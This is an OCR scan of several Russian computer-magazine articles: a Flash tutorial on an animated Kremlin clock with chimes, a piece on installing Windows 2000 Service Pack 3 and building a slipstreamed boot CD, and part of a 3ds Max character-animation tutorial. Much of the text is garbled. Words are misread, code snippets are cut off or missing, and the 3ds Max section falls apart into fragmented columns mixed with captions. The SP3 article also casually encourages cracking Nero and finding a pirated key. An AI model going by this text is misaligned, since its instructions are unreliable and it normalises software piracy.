простыми, а кремлевского образца. Посему 
предлагаю изобразить Спасскую башню в 
полный рост в полную ширь и на весь экран. 
В этом случае, при условии, что у тебя и 
твоих ээмм... посетителей зрение не как у 
крота, а твой монитор в рабочем состоянии, 
все прекрасно насладятся видом вполне ре- 
алистичных часиков ака курантов. 

Кстати, именно в этот момент от тебя по- 
требуется уж если не максимум, то просто 
много усилий. Напрягись и нарисуй Кремль, 
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как следует, т.е. красиво. Иначе ты не суме- 
ешь остановить в панике разбегающийся от 
тебя разочарованный народ. Самые недо- 
вольные вдобавок еще надругаются в особо 
извращенной форме над твоим монитором 
и проклянут Великий Flash. Так что повто- 
рюсь: если ты рисуешь сам, то делай это хо- 
тя бы с фотки или какой-нибудь открытки с 
Кремлем. Спасская башня, укомплектован- 
ная курантами, там присутствует обяза- 
тельно. 


Об интеграции часов в Кремль мы погово- 
рим попозже (сейчас пока можешь нарисо- 
вать на их месте пустой круг и обратить его 
в символ клипа «С - Clock»). А поговорим о 
крыше сооружения. Я надеюсь, ты не стал 
рисовать ее второй раз, а использовал уже 
готовый символ «С - Roof». Как ты по- 
мнишь, центр этого символа находится в се- 
редине его нижней стороны. У мувика 
Кремля с центром надо сделать точно так 
же. Ставь всю башню так, чтобы центр кли- 
па был ровно в середине ее нижней сторо- 
ны (для точности советую не двигать кар- 
тинку мышкой, а опять обратиться к панели 
Transform), стены одинаковой длины - по бо- 
кам от нее. Получилось так, что центр кли- 
па крыши находится аккурат над центром 
клипа Кремля. Зачем? А вот зачем! Нажми 
правой кнопкой на мувике крыши и выбери 
там Actions. Вводи: 


Задай клипу целого Кремля, расположенно- 
му на главной сцене, имя «Kremlin», а клипу 
его крыши, как это очевидно - «roof». Собы- 
тие клипа «mouseMove», если ты не знал, 
срабатывает при любом движении мыши 
(независимо от того, находится ли в данный 
момент мышкин курсор над клипом или 
нет). Теперь, когда курсор мыши находится 
по правую половину твоей флешки, крыша 
башни наклонена вправо. Как только курсор 
переходит на левую половину, крыша плав- 
но переходит туда же. Ну и обратно, соот- 
ветственно, тем же путем и в той же позе. 
Можно сделать крышу составленной из не- 
скольких элементов, анимированных каж- 
дый по-своему. Это при значительном изме- 
нении и, несомненно, увеличении кода для 
мувика крыши и его отдельных кадров мо- 
жет дать впечатляющие эффекты... 


Помнишь наши пустые куранты? Пришло их 
время. Сделай в «С - Clock» четыре слоя. 
Зеленый круг фона вместе с цифрами поме- 
щай на самый нижний слой, назови его в 
честь этого - «Fon». Верхние три слоя будут 
у нас для стрелок (сверху вниз: «Атом» - 
для секундной стрелки; «АтомМ» - для ми- 
нутной; «АтомН» - для часовой). В принци- 
пе, можно в любой флешке все запихнуть в 
один слой, главное - имена для клипов за- 
дать корректно. Но меня, например, очень 
сильно напрягает ситуация, когда так полу- 
чается, что один 
символ почти полно- 
стью скрыт другим 
и, следовательно, 
трудно выделяем. 
Да и вообще, любая 
неразбериха и пута- 
ница среди симво- 
лов и групп симво- 
лов — практически 
сводится на нет, при 
условии расположе- 
ния каждой отдель- 
ной функциональ- 
ной единицы на от- 
дельном слое (осо- 
бенно, если эти слои 
названы соответст- 
венно). 

У тебя могут по- 
явиться трудности с 
размещением цифр 
по кругу на одинако- 
вом расстоянии от 
центра. Лучше все- 
го использовать от- 
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резки линий в качестве ограничителей это- 
го расстояния. 

Стрелки часов делай так, чтобы центр кли- 
па стрелки был в месте оси их вращения, а 
тот конец, который именно указывает, был 
направлен вверх. Если ты меня поймешь 
правильно и все сделаешь, как надо, то при 
размещении всех трех стрелок в центре ци- 
ферблата, часы покажут ровно двенадцать 
часов. Задай для клипов стрелок такие име- 
на: секундная стрелка (клип «С - ArrowS») - 
«ars»; минутная (клип «С - ArrowM») - «arm»; 
часовая (клип «С - ArrowH») - «arh». 

Теперь звук. Нам нужен клич курантов в 
«круглые моменты», т.е. то, что ты услы- 
шишь ровно в час, два и т.п., стоя круглосу- 
точно на Красной площади - повторяющий- 
ся N раз звук типа «большой колокол». Со- 
ветую не заморачиваться с поисками его в 
интернете (геморрой поимеешь размером с 
монитор :)), а просто взять да и записать 
его с постороннего прибора во время заста- 
вок новостей, окончаний/ начал передач и 
т.п. Потери в качестве с лихвой компенси- 
руются выигрышем во времени, финансах 
(при условии платного инета) и в плане здо- 
ровья нервов :). Полученный звук (например 
«bum.wav») импортируем Bo Flash. После 
импорта ищи его в библиотеке и жми Ha нем 
правой кнопкой мыши. В выпавшем меню 
выбирай «Связывание» («Linkage»). В от- 
крывшемся окошке «Свойства звука» ставь 
ИМЯ «bum.wav». Именно под этим именем 
данный звук теперь будет как бы экспорти- 
роваться в ActionScript. 

Заходи в редактирование клипа кремля и 
для мувика часов вставляй код: 


Объект Flash’a Date(), экземпляр («time») 
которого мы создаем, дает доступ read/ 
write к инфе о времени (как о местном вре- 
мени, так и о стандартном времени по Грин- 
вичу) и дате. Дата нам пока не нужна, да и 
устанавливать мы ничего не собираемся, а 
вот спросить у своего компа, сколько там 
времени, нашей флешке надо. Для этого мы 
пользуемся такими методами объекта 
Date(), как getHours(), getMinutes() и 
getSeconds(), возвращающие соответствен- 
но текущие час, минуту и секунду. В соот- 
ветствии с этими значениями мы поворачи- 
ваем стрелки твоих маленьких курантов на 
определенные углы. 

В событии клипа «load» мы ставим в соот- 
ветствие переменной «ding» наш звук 
«bum.wav». Теперь этим звуком можно уп- 
равлять из ActionScript. Что мы и делаем в 
случае, когда часы показывают ровно час, 
ровно два часа и т.п. А делаем мы следую- 
wee: мы проигрываем долбеж в «Бит.мау» 
столько раз, сколько натикало целых часов. 


OCHOBHAA СЦЕНЯ 


оооооооо ооо ооо 


Осталось только вынести что-нибудь на ос- 
новную сцену. Давай сделаем так, чтобы 
Кремль не все время присутствовал на твоем 
Рабочем столе, а выдвигался при нажатии на 
характерного вида кнопочке («В - 
StarButton»). Для этого на основной киноленте 
нам понадобится четыре слоя. В самом верх- 
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нем первый и двадцатый кадры преврати в 
пустые ключевые и поставь в них stop(). В 
третьем слое в первом кадр выноси кнопочку 
«В - StarButton». Расположи ее в самом низу 
рабочей области ровно посередине. Скопи- 
руй этот кадр еще на два в том же слое и сде- 
лай с этими двумя новыми «Create Motion 
Тмееп». Звездочка в них должна стать пол- 
ностью невидимой к девятнадцатому кадру. 
В первом кадре для незатронутой никакими 
преобразованиями кнопки пиши скрипт: 


on (press) { 
gotoAndPlay(2); 


В четвертый слой выноси клип кремля. Дай 
ему имя «kremlin». Делай два кадра с Motion 
Tween, в которых с первого по двадцатый с 
Кремлем происходит следующая анимация. 
Он из сжатого по вертикали состояния и из 
такого положения, что на рабочую область 
из всего Кремля торчит только лишь звезда 


oo 


Close Flash 


его крыши (как раз под кнопкой «В - 
StarButton») превращается в полноценное 
сооружение на весь экран. 

Когда ты запустишь эту флешку, случится 
вот что. У тебя на экране будет только ма- 
ленькая кремлевская звезда. После нажа- 
тия на нее снизу выползет Кремль с куран- 
тами. Кстати, о курантах. Помнишь, когда 
мы проверяем, круглое ли сейчас время, мы 
запихнули в тот if еще (_root._current- 
frame>=19). Tak вот это проверка для того, 
чтобы куранты били время лишь в случае, 
когда на основной сцене Кремль полностью 
виден (т.е. текущий кадр где-то в районе 
двадцатого). Так-то. 


CLOSURE 
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Ты ни разу не замечал, если у тебя не самая 
быстрая машина, что Flash на Рабочем сто- 
ле делает ее еще менее быстрой. Если все 
равно иметь постоянную флешку на экране 
очень хочется, советую сделать такой меха- 
низм. Нарисуем еще одну кнопочку (напри- 
мер, «В - Close») и расположим ее в специ- 
ально заранее сделанном для нее втором 
слое главной сцены, растянув кадр на все 
двадцать. Пиши для нее: 


on (press) { 
getURL(«light.html», self); 


Hy, теперь осталось сделать очень-очень 
легкую (т.е. пустую по самое не хочу) html- 
ку, в которой должна быть одна лишь кно- 
почка - для возврата во флешку. Сделай 
кнопочку в виде маленькой картинки, для 
которой вставь: 


onClick=»self.location=’Kremlin.html’s» 
так будет и легко и красиво. Можешь радо- 


ваться :). 
И да пребудет с тобой великий Flash! 
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ВСКОРЕ ПОСЛЕ ВЫПУСКА 2-ГО СЕРВИСПАКА ДЛЯ ВИНТУКЕЯ 
МАЙКРСОСОФРТОВЦЫ ПРИЗНАЛИСЬ, ЧТО В ВИНДАХ ОСТАЛОСЬ 
БАГОВ ЕДВА ЛИ НЕ В ДВА РАЗА БОЛЬШЕ, ЧЕМ ОНИ ПРИКРЫЛИ 
ПЕРВЫМИ ДВУМЯ СЕРВИСПАКАМИ! ЧЕСТНОСТЬ - ЭТО, КОНЕЧНО, 
ХОРОШО, НО БЫЛО БЫ ЛУЧШЕ СРАЗУ ДЕЛАТЬ ДОРАБОТАННОЕ 
ПО, А НЕ ПУСКАТЬ НА РЫНОК (ПУСТЬ И НА НАШ ПИРАТСКИЙ :)) 
ПОСПЕШНО НАЗВАННЫЕ FINAL RELEASE РАЗНЫЕ БЕТЫ. 
СОГЛАСЕН? МЕЧТАТЬ ОБ ОТСУТСТВИИ ГЛЮКОВ, КОНЕЧНО, НЕ 
ВРЕДНО (ВРЕДНО НЕ МЕЧТАТЬ). НО РЕАЛЬНОСТЬ НЕМНОГО 
ОТЛИЧАЕТСЯ OT ТВОИХ МЫСЛЕЙ, КАК БЫ ТЫ НИ ЖЕЛАЛ ДРУГОГО. 
ЕСТЬ ЕЩЕ ТАКИЕ КОНТОРЫ, КОТОРЫЕ HE БРОСАНЗТ СВОЕ ДЕТИЩЕ 
НА ПРСОИЗВОЛ СУДЬБЫ. BOT И М$ ВЫПУСТИЛИ ОЧЕРЕДНОЕ 
ОБНОВЛЕНИЕ длЯ ДВУХТЫСЯЧНыЫхХ - ТРЕТИЙ СЕРВИСПАК. 


БЫТЬ HH НЕ БЫТЬ 


3-ий сервиспак по своему назначению не 
сильно отличается от предшественников. Вот 
и на этот раз все составляющие $Р призваны 
повысить совместимость софта, надежность, 
безопасность. В третьем сервиспаке содер- 
жится все, что было в первых двух сервиспа- 
ках, а также исправления обнаруженных по- 
сле выхода SP2 оставшихся дырок. Точное 
число исправлений я затрудняюсь назвать, 
ибо все время сбиваюсь, но их примерно око- 
ло тысячи :). К важным новинкам можно от- 
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нести безотказное переключение раскладки 
клавы в консольном режиме, ускорение рабо- 
ты компов с разбитыми на несколько частей 
(только не физически, а логически :)) харда- 
ми, устранение повисания компа на слабень- 
ких машинах при использовании сидюка, сни- 
жение загруженности процессора при от- 
правке на печать доков и многое другое. Да- 
же простое перечисление исправлений зай- 
мет не одну страницу журнала, а с этим у нас 
напряженка. «Меньше знаешь - крепче 
спишь» :). Кроме исправлений привычных на- 
правлений появилась новая фишка в «Уста- 
новке и удалении 
программ» - «Выбор 
программ по умолча- 
нию». Отныне в 


двухтысячных (как и 
в Windows XP Service 
Pack 1) можно стан- 
дартными методами 


надежно засунуть мелкомягкий софт (ек- 
сплорер, аутлук, виндовз медиа плеер) куда 
подальше, а вместо их использовать то, что 
тебе больше нравится. Совесть у них что ли 
просыпается? Или по судам таскать достали? 
Не так это и важно, главное - сам факт. Есть 
ОДНО «HO» - удалить не нравящиеся тебе тво- 
рения стандартными методами не получится, 
их можно только скрыть! Не печалься, ты же 
не ламо какой-нибудь, придумаешь, что сде- 
лать. Ну или спросишь кого-нибудь более ша- 
рящего. 


nO4Wy? 
Если тебе уже захотелось заинсталлить SP3, 
то сначала решай, как ты его достанешь. Ве- 
сит он порядка 135 метров, так что качать 
модемщикам придется не один час. Не сидеть 
же перед компом все это время. Когда захо- 
чешь уже завалиться спать после долгих по- 


пыток атаковать серваки в сети, то залезь на 
http://www.microsoft.com/windows2000/ 
downloads/servicepacks/sp3/sp3lang.asp u 
поставь свой даунлоудер качать сервиспак, 
пока тебе будет сниться, что ты стал кулхац- 
кером и ломанул комп самого Билли Гейтса. 
Можно также заиметь сидюк с сервиспаком и 
ставить с него, но это уже как-то не по-наше- 
му - такой метод подойдет для твоих менее 
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Расположение галочек в опции ISO 


шарящих друзей и подружек. Кстати, в твоих 
силах сделать последним приятно, но об этом 
ниже. 


ШПНОН В СЕРЬНСПИНЕ! 


Вот уж чего не ожидал, наверное, никто! Ска- 
yan ты себе SP, поставил его куда надо, ре- 
бутнулся, а тут уже шпион появился! На са- 
MOM деле, это не новинка сервиспака, a 
встроенный модуль всех виндов, просто до 
появления зру-КШега Ad-aware про него про- 
сто не знали. 


Не скажу, что Alexa - страшный spyware. Из- 
бавится от него будет просто (если меня по- 
слушаешь). Один из вариантов - это запус- 
тить Ad-aware, чтобы та удалила Аеху. Но 
можно ускорить процесс убивания этого зру- 
модуля. Запускай regedit, ищи ключик 
HKEY_LOCAL_MACHINE\software\microsoft\int 
ernet explorer\extensions\{c95fe080-8f5d-1 1d2- 
a20b-00aa003c157a}, теперь стирай все клю- 
чи в этом разделе на хрен. Не боись, «за ка- 
чество отвечаю» :). Еще один совет от меня 
- не подрубайся к Инету до удаления ключа 
реестра, а то многовато данных о твоих при- 
страстиях в вебе будет послано от експлоре- 
ра хз куда. 


KOMBHHHPOBARHHAA 
4CTAHHOBRA SPF 
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Наверняка у твоих горе-подружек частенько 
все начинает глючить или перестает рабо- 
тать, и тебе приходится приходить и в оче- 
редной раз ставить виндовз. Ты можешь 
сделать диск с комбинированной установкой, 
т.е. при установке Win2k’ea 3-ий сервиспак 
будет сразу же поставлен на машинку. Пона- 
добятся для этого дистрибутивы Win2k, SP3 
для него, резак (СО-В(\\/)) и болванка. Заве- 
ди на харде папку, в которой ты сделаешь 
прообраз будущего диска, например, 
C:\win2k-inst. Теперь бери диск с дистрибути- 
вом Win2k и перекинь все содержимое диска 
в созданную папку. Далее запусти файл 
W2Ksp3.exe с ключом «-5:<путь к папке с 
виндами>». В твоем случае это будет выгля- 
деть так: «w2ksp3.exe -s:c:\win2k-inst». В ре- 
зультате должно получиться 6 папок (ВООТ- 
DISK, DISCOVER, 1386, SETUPTXT, SUP- 
PORT, VALUEADD - они вообще-то и были на 
инсталляционном диске, если это правиль- 
ный диск) и несколько файлов для авторана 


с интегрированным сервиспаком 


будущего сидюка плюс необходимые файлы, 
которые лежат в корне директории вроде 
bootfont.bin и прочих - не вздумай их стирать, 
не ты их туда клал :). Если все сделал пра- 
вильно, то у тебя на харде лежит дистрибу- 
тив Win2k с интегрированным Service Pack 3. 
Созданным делом ты пока можешь пользо- 
ваться только на своем компе (хотя как ты 
будешь загружаться из папки на винчестере 
- я не представляю). Поэтому все, что тебе 
осталось сделать, - закатнуть это хозяйство 
на болванку так, чтобы диск получился за- 
грузочным (не путай авторановый и загру- 
зочный диски!). 

Из всех прог для записи компактов наиболь- 
шее предпочтение отдано мной Nero - Burning 
Вот (не считай это рекламой - это просто со- 
вет, тем более 2 с хреном тысячи человек из 
3 тысяч опрошенных известным сайтом, по- 
священном виндовозным новостям, а также 
вся WINfo-crew не могут ошибаться). Собст- 
венно, ею и рекомендую воспользоваться 
для достижения цели. Если у тебя ее еще не- 


ту, то немедленно лезь на сайт производите- 
ля www.ahead.de, где всегда лежит послед- 
няя версия программы. Ключик к ней най- 
дешь сам, не маленький. 

Итак, ты заинсталлил и крякнул Nero 5.5.9.9 
(на данный момент самая последняя версия). 
Выбери в New Compilation - Cd-Rom (Boot). 
Лезь в опции Boot. В строке Image File укажи 
путь к файлу boot.ini (можешь скачать его на 
нашем сайте http://winfo.org), поставь галку 
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Метки для будущего диска 


около надписи Enable Expert Settings (For 
Advanced Users Only) и в строке Boot Message 
обязательно введи большими буквами 
MICROSOFT CORPORATION. 


Bo вкладке ISO отметь, если это не сделано 
ранее, следующие штучки: в File/Directory 
name lenth - ISO Level 1, Format - Mode 1, 
Character Set - ISO 9660, поставь галку около 
Joliet, в Relax ISO Restrictions выбери только 
Do not add the ‘1;’ ISO file extension. 


Осталось прописать нужные заголовки в оп- 
циях Label. Тут будь внимательнее, ибо без 
правильного заполнения этой менюшки, как, 
собственно, и двух предыдущих, ничего у те- 
бя не получится. И не стоит быть слишком 
самонадеянным - уже сам убедился :(. А вби- 
вать нужно следующее: Volume Label (метка 
диска) - SP3POEM_EN, в строках Publisher и 
Data Preparer - МИСВОЗОЕРТ_СОВРОВА- 
TION, Application - NERO BUNING_ROM 
(после NERO идут 3 нижних подчеркивания). 
В самом низу окна выбери опцию Also Use 
the 1509660 text for Joliet. Остальные поля 
оставляй пустыми - они не нужны для нашей 
задачи. 


Никто не забыт, ничто не забыто? Теперь с 
криком «Burn, Motherf#$%r» начинай запись 
сидюка. Такой диск сэкономит порядка полу- 
часа при установке винтукея на чистую ма- 
шину. А уж как распорядиться этим време- 
нем, тебе самому лучше знать. И не забудь 
закатнуть дистрибутив сервиспака в отдель- 
ную папку, ибо у кого-то и так винды могут 
работать нормально, а обновить операционку 
не помешает. Не сносить же ее для обновле- 
НИЯ :). 


INSTALLATION СОНРЬЕТЕ 


Если ты все еще в раздумье, ставить SP3 или 
нет, то думай :). И учти, что на вопросы о ра- 
боте 3-го сервиспака явное большинство за- 
явило, что винды и грузиться стали быстрее, 
и сообщения об ошибках проскакивают реже. 
И никто из опрошенных не сказал, что после 
сервиспака что-то стало хуже работать. При- 
ми к сведению такой небольшой намек на 
толстые обстоятельства :). К тому же, если 
тебе посчастливится стать первым ругаю- 
щимся на SP3, To ты всегда сможешь его 
безболезненно Uninstall’'vtb. 
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_ МЕНЯ SOBYT 


Владимир Томилин aka «Middlenight» 


TOnNMNUBYD 


ЧАСТЬ 1 - КАСТИНГ. 


(middlenight@mail.ru) 


ENTERING... 


ведь если следовать, допустим, 


это человек, который имеет свою тачку м 


пполтучает за это деньги. Из всего 


гилане создания кино - ТЫ профан. 


Это не оскорбление, это, как я считаю, пе- 
чальная действительность. Помнится, лет 
семь назад, читая наши и западные компью- 
терные издания, я натыкался на фразы, что 
де наступает эра мультимедиа и скоро каж- 
дый будет делать на домашнем компе филь- 
мы, не уступающие гремевшей тогда «Тоу 
Story», выражать свои идеи и зарабатывать 
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на этом бабки. Ну и что мы имеем сейчас? 
Эра мультимедиа вроде как наступила, ком- 
пов у народа стало больше, а тот самый 
«каждый» так и не появился. Ты не согласен? 
Ну, тогда скажи, сколько у тебя есть своих 
роликов-мультиков-клипов, которые ты мо- 
жешь с гордостью показать друганам, толк- 
нув кассету в видак? Нисколько? А хочется? 


-Шк\ 


Ну что ж, из желающих я постараюсь наибо- 
лее простыми способами сделать маленьких 
Ронов Торнтонов. Поверь, я знаю, о чем го- 
ворю... Что? Кто такой Торнтон? Да, плохи 
твои дела, приятель, слухай сюды. 


СЮЖЕТЕЦ 


С чего начинается любой фильм? Если ми- 
новать поиск денег на картину, то это - сце- 
нарий. Пожалуй, блокбастер мы сразу де- 
лать не будем - ограничимся двухминутным 
роликом, соответственно - нужна простень- 
кая история. Предлагаю такую: хай-тек лабо- 
ратория, вдоль стен расставлены различные 
движущиеся механизмы, посреди, в сетке из 
лазерных лучей, на электрическом стуле си- 
дитчел. Через шлем а-ля «Нирвана» смотрит 
на двух суетящихся рядом вокруг компа вра- 
чей. На мониторе вращается схема его го- 
овы и разные данные. Врач нажимает на 
нопку на клавиатуре, после чего в вену чела 
поступает кислотного цвета жидкость. Чел 
звереет, превращается в монстра и дает 
всем п... По мозгам! 


= 


ТЫКВЕННЫЙ ПЛЮГИН 


так, сюжет готов - приступаем к съемкам. 
Хватит разных примитивных уроков - начи- 
ать я всегда предпочитаю (и тебе советую) 
с самого сложного: в данном случае это со- 
здание персонажей и подготовка их к анима- 
ции. Для начала нужна голова. Тыквой, ко- 
нечно, можно разжиться на просторах Ине- 
та, но это - не самый лучший вариант. Вооб- 
le, привыкай самое основное делать сам, 
поэтому беги за плагинами для твоего друга 
акса. Макс без плюгинов - существо мало- 
способное к жизни. Один из предыдущих но- 
меров Х освещал тему плагов, и я сразу тебя 
предупреждаю: чтоб использовать все по- 
равившиеся тебе плагины, нужно разжить- 
ся как минимум четырьмя версиями Макса 
(2.5, 3.1, 4.0 и 4.2 - про пятый и не гов 
там вообще самоубийство), так как плагины 
эти несовместимы ни вниз, ни вверх, а п 

компилированные версии найти в Москве 
(соответственно и в России) практически 
невозможно, но зачастую очень необходимо 
отснять тот или иной эффект. Короче, чтобы 
сделать хорошую голову в четвертом Максе 
тебе нужен плагин DIGIMATION HEAD 
DESIGNER \.1.1е. Он обладает туевой хучей 
настроек, в которых ты спокойно разбе- 
решься и без меня, если знаешь, что Jaws - 
это челюсть. В данном случае можно взять 


дефолтного пациента и малость подправить 
ему лопоухость соответственно параметра- 
ми «Глубина» и «Вращение». 


же движется синхронно с верхней. Надо по- 
фиксить: беремся за башку и идем в Modify, 
выбирая Skin, лезем в Envelope, выделяем 
точки нижней губы, ставим флажок на 
Vertices (вершины) и пишем в параметрах 
ABS - 0,0. Это подавит действие модифика- 
тора Skin на выделенные вершины, и пере- 
мещаться будет только верхняя губа. 


ОТКРОЙ РОТИК 


Основная задача этой тыквы по сюжету - 
скалиться при ударе током, поэтому надо го- 
товить рожу к анимации. Начнем с губ. Тре- 
буется создать линию из нескольких прямых 
кусков (чем больше - тем лучше, но и слож- 
нее) и распределить ее равномерно по кон- 
турам верхней губы. Лучше создать линию с 
нечетным количеством вершин, чтобы верх- 
няя точка была посередине губы. 
Если вышла лажа, то это довольно легко по- 
править: щелкни правой кнопкой мыши на 
выделенной лин и выбери «convert to 
editable spline» (сплайн - это, собственно, и 
есть линия). В открывшемся окне модифика- 
ции (вторая вкладка сверху на тулбаре) 
\елкни на группе точек, символизирующих 
собой вершины. Теперь можно хватать каж- 
дую точку отдельно и двигать. Оставаясь в 
том же режиме, переходи в окно боковых ви- 
дов и распределяй вершины по профилю от- 
носительно верхней точки. В итоге должна 
получиться своеобразная губа «бантиком». 


УРОКИ АНАТОМИИ 


Приоткроем-ка теперь рот нашему пациенту. 
Да, верхняя губа выглядит достаточно реалис- 
тично. Теперь, когда она готова, делай все вы- 
'еперечисленное с нижней губой (долго, нуд- 
но - знаю, но скоро ты будешь все это делать 
за парсек), чтобы рот был открыт равномерно. 
Что-то не так... Учите анатомию, Киса! Ведь 
нижняя губа перемещается за счет смещения 
челюсти, а у нас подборолок как стоял себе, 
ак и стоит. Раз плюнуть: делай на профиль- 
ном виде линию, по форме очерчивающую 
сбоку подбородок, но меньшего размера и 
находящуюся внутри челюсти, аккурат посе- 
редине нее, если смотреть анфас, но не до- 
ходящую до шеи, дабы она не падала син- 
ронно с челюстью. После создания линии 
делаем все то же самое со Skin, что и раньше. 
Редактируя вершины, на которые повлияет 
модификатор, добейся полной красноты че- 
люсти и синевы в районе щек. Так, отвели че- 
люсть вниз. Фуух! 
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Теперь настала очередь применить знамени- 
тый модификатор Макса - Skin. Выделяем 


Самый известный клим, 
сделанный в Максе, - 
«Клязьма» группы «Ногу 
свело». Делался он 
наР'!-100/1 28МВ. 
Теоретически в Максе 
можно сделать SO% 
отечественных клипов, 
вкоторых используется 
компьютерная графика. 


ГЛАЗА, ЗУБЫ, ХВОСТ 


Для пенсионера-инвалида наш парень (назо- 
вем его Трофимыч) очень даже не плох... Ну 
как же - беж жубов, беж глаз, яжыка, да и во- 
обще без всего. Фигово, но поправимо: в 
стандартной поставке плагина HEAD DESIGN- 
ЕВ в директории «Scenes» есть набор глаз и 
зубов (кстати, зубы - это простые боксы, так 
что можешь элементарно заделать любой 
прикус). Чтобы их добавить, выбираем «File- 
>тегде->нужный файл->нужный объект». 
Вставляем глаза в глазницы, редактируем их 
OpMy и размер так, чтобы они были малость 
выпучены (опять же - удар током и все такое 
:). Текстура глаз у нас есть, однако надо бы 
подогнать размер зрачка, чтобы он оставался 
округлым. Для этого надо поиграться со зна- 
чениями tiling - размещения карты. Таким ра- 
ом сужаем или расширяем битмап до состо- 
яния зрачка и... Стоп! 


всю рожу, открываем Modifier list и назначаем 
Skin. В выпавшем окошке появится куча зна- 
чений, среди которых будет кнопка «Добавить 
кости» («add bones»). Давим на нее и выбира- 
ашу линию, которая будет костью. Вооб- 
le, в Максе костями, то есть ниточками, дер- 
нув за которые, можно что-либо двинуть/по- 
ернуть, могут быть практически любые объ- 
екты, так что вместо линии можно было ис- 
пользовать хоть черта лысого, просто с лини- 
ей удобнее всего обращаться. Теперь, после 
назначения чайнику модификатора Skin, мо- 
жешь дернуть за какую-нибудь вершину ли- 
НИ увидеть, как рожа исказится. Только 
ак-то неправильно исказится... Как будто в 
дюхе рамдак глючит. Забыл предупредить, 
то сейчас смещаются те вершины, которые 
заданы по умолчанию :). Надо бы это пресечь. 
Целкаем правой кнопкой по роже и выбира- 
ем «Sub-object—> envelope». Нас закинет 
еще в одну менюху, в которой все до безоб- 
разия просто: из всего нам понадобится 
олько кнопку «А» поменять на «В». Это зна- 
чит, что выделившиеся на роже два круга по- 
кажут нам реальную картину распределения 
зон влияния модификатора. Чем краснее, тем 
сильнее, синяя же зона - наиболее слабая. 
Все это редактируется простым дерганьем за 
выделенные вершины этих кругов. 
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ОТРАЖЕНИЕ 


Если ты взял глаза и сцен, следовательно, 
все происходит на заранее приготовленном 
материале, а он далек от совершенства. Ес- 
ли ты не забыл законы физики, то должен 
знать, что любая поверхность, на которую 
падает свет, отражает оный, что уж говорить 
о глазах! Дефолтные значения Макса тут не 
подходят, так что выбирай новую карту и иди 
в «Maps->reflection->raytrace», а затем уже - 
в «Maps->diffuce со!ог->карта глаза». Далее 
поиграйся в настройках райтрэйса по свое- 
му вкусу. Например, покрути глубину трасс 
ровки, цвета отражаемого света. Вообще, 
возьми за правило, что свет не отражает 
только черная дыра (которая в космосе). В 
общем, назначаем все это добро глазам 
(или драг-и-дропом до объекта, или выде- 
лив нужный объект и щелкнув на кубике со 
стрелкой). Теперь надо сделать так, чтобы 
глаза могли перемещаться вместе с голо- 
вой. Для этого просто щелкаем на значке 
Link to object (где-то слева от стрелок выде- 
ления есть три кнопки линков), выделяй один 
глаз и веди пунктирную линию до головы. 
Когда значок привязки будет активен, отпус- 


Треба оставить красную зону только в райо- 
не губ, а синюю чуточку по краям - чтобы 
мышцы «типа сокращались» :). Теперь все 
вроде бы хорошо, вот только нижняя губа то- 


раде 097 


Рис. 7. Трофимыч в гриме. 


кай 


кнопку мыша - готово, глаз привязан. Те- 


перь другой глаз. Так мы создали иерархию 


об 


no 


ьектов, в которой глаза следуют за чере- 


(но не наоборот). 


ЗУБЫ ДЛЯ ЧАЙНИКОВ 


Теперь зубы. Верхнюю челюсть можно сразу 


пр 
др 
не 


вязать к голове, а вот с нижней придется 


ючиться дальше. Дело в том, что больше 


объекта, к которому можно ее привязать, 


чтобы она перемещалась вслед за движения- 


губ. Хотя если заюзать встроенный язык 


ax script... Но не будем об этом. Так что 
далыше придется перемещать челюсть вруч- 
ную. Ради удобства можно привязать ее к ка- 
ому-либо объекту, например, Dummy 
helpers->dummy) - невидимому вспомога- 
тельном объекту (у америкосов «аиппу» - ма- 
некен, означает то же, что и у нас «чайник»), 
ли к любому другому, убрав в preferences 


(выпадает по левой крысе) галку с renderable. 


ПОДТЯНЕМ КОЖУ 


Ну, в общем, голова Трофимыча готова, ос- 
талось ее текстурировать. В Инете есть мас- 


Рис. 9. Шкелет в сБоре. 
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ета, то в ста 
есть несколько та 
териал, цепляем 
ers\max_head 
забуль про отраженн 
отражается. 
ь кого-нибудь 
сразу это увидишь. П 
рить - все равно 
le надо правил 
выбираем из сп 
Мар и выбираем су! 


нему текстуру п 
чаем голове. 
- ОТКОЖИ OH 
сфотограф 
«Полароидом 
ожешь не рен 
учится, текс 
наложить. Для этого 
одификаторов UVW 
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цилиндр - это ка 
лицо. Надо его п 


ция текстурь 
ьно подогнать. Ш 


Человек, который сидит 
всметаемом ударной 
волной офисном здании 
в фильме «День 
независимости», - 
режиссер спецэффектов 
к картине Уолкер Енгель. 


са карт лица, но если влом искать или нет 
дартной поставке Макса 
раем ма- 


aps\char- 


He 
O- 


po- 


» - 


де- 
ypy 


и, пару слов о 
тал, что стандартный 
ся довольно поганым, 
одули просчитывают сцену бы- 
выдают лучшие результаты. Насчет 
х результатов не спорю, а вот насчет 
.. При использовании любого из 
х рендеров скорость просчета падает в 
: наиболее быстрым тут можно считать 
а! гау, медленнее его в несколько раз 
‚ за ним идет хит нескольких се- 
(если руки растут откуда нало, 
ожно получить очень качественную кар- 
у). Для третьих Максов есть еще такое 
чудо, как Ray Gun, однако 
ользоваться 


аемые м 


rende 
ов - Brazil 


Рис. 8. Зацени превью кричи. 


левой кнопкой 
раем «Sub object->Gizmo» 
ь этот самый г 
бычный цилиндр. 
все корректно п 
зации получится дово 
да симпатяшка Т 


О ТОРМОЗАХ И 


родел 


рофи 


ыша на объекте, выби- 


и начинаем под- 


змо вровень с лицом, 


ано, то после ви- 
льно любопытно- 
ЫЧ. 


ЯКОРЯХ 


ак как он не поддержива- 
е подключаемые атмосферные (и не 
эффекты и частенько, по необъясни- 
чинам, уходит в даун вместе с Мак- 
. Поскольку по сюжету действие нашего 
ьма будет происход 
ещении, советую исп 
стабильно работает (кстати, только 
и поддерживает все необходимые 


ть в полутемно 
ользовать Мета! 


визуализации: как-то я 
движок Макса яв- 


зато другие под- 


не советовал бы 


‚ о которых я позднее расскажу. 


ПОЩУПАЕМ 


Рис. 10. Шкелетон пошел! 


ТЕЛО 


игачили мы голову, теперь пора бы и за 
тело взяться. Опять же можно перекопать 


МЕНЯ ЗОВУТ ГОЛЛИВУД 


ПОДВИГАЙ ТАЗОМ 


Е 


тобы тело не мешалось и случайно не выде- 
лялось - щелкни на нем и нажми «6», а чтобы 
опять мешалось - «7»). Затем скопируй эти 
два эллипса, опусти копии в район паха и со- 
размерно увеличь. Теперь выдели внешний 
эллипс в паху и сделай его редактируемым. 
Нажми attach и присоединяй внешний эл- 
липс на бедрах, потом внутренний эллипс на 
бедрах и внутренний эллипс в паху. В итоге 
получился объемный сплайн. Идешь в стек 


модификаторов и выбираешь Cross section. 


